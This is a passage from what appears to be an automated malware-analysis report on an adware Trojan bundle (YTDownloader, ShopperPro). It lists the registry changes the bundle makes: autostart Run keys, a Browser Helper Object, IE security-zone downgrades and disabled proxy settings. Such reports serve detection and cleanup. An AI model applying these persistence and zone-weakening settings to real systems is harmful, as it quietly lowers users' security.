"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayName" = "YTDownloader"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe]
"(Default)" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "%Program Files%\YTDownloader\"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"MaxConnectionsPerServer"
"MaxConnectionsPer1_0Server"

The process YTDownloader.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\YTDownloader]
"UserId" = "{A12A645F-7F13-46EC-98C0-57B180FEB515}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 76 00 AE B6 75 BE 07 79 46 61 9D 26 32 BA 12"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCU\Software\YTDownloader]
"UserId" = "{A12A645F-7F13-46EC-98C0-57B180FEB515}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tcpsvcs.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 1E 69 E8 3F 7B ED 78 02 1A 3C CD 41 C7 29 1D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process ins_geforce.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 71 F1 15 68 F7 3C 38 93 E0 1D 2A 72 49 7E 5F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"c98dc9.exe" = "c98dc9"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process ShopperPro.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"ExeLocation" = "%Program Files%\ShopperPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtID" = "ojhagnahfpegocdhlopgljpaafeogmcc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\ShopperPro]
"CONFIGLOCATION" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKLM\SOFTWARE\ShopperPro\ExtraInfo]
"DBVersion" = "1.0.2.0"

[HKLM\SOFTWARE\ShopperPro]
"DBLocation" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"Aff" = "obrdc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\ShopperPro]
"Version" = "3.1.10955.2221"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtFile" = "ShopperPro.crx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 E4 A5 1B B5 0C 2C 37 01 2E 6A 7F 89 2B 00 8E"

[HKLM\SOFTWARE\ShopperPro]
"UserId" = "99999999-9999-4a59-bea0-eea83fb95fc9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"NoExplore" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process c98dc9.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 73 7F 05 BA 41 8B 25 CF 6B 52 D3 F0 4C 18 C2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_shopperpro.exe:1204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC AA FC 22 DA B1 21 5C EE 94 D4 3D 19 97 AB 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

